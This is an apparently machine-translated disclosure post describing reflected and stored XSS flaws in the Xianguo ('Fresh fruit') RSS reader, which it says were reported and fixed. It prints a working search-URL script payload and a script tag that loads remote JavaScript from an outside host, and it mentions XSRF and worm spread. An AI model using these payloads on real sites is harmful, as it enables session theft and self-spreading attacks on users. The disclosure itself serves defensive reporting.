Author: cnryan
Fresh fruit RSS is the main platform for reading information. It is used every day. Therefore, its filter also has a vulnerability.
1. reflective xss @ Search Engine
Fresh fruit Search Engine
Http://xianguo.com/search? SearchType = 11 & keyword = "> <script> alert (111) </script> <
2. Receiving xss @ friends sending and receiving
Test code:
<XSS00> SBSB
From firebug, You can see <tag> translate to <tag> </Tag>
Single quotes are filtered
Double quotation marks are also filtered"
Inject script,
The sender can construct a malicious address. iframe is a harmful page.
The most threatening is the ability to load and call remote JS
<Script src = http://hi.cnryan.com/3.js>
The friend information exchange system uses XSRF under certain conditions, such as adding a blog channel's rss, or even spreading it as xss worm.
The BUG submitted yesterday, fresh fruit also responded quickly and has been fixed.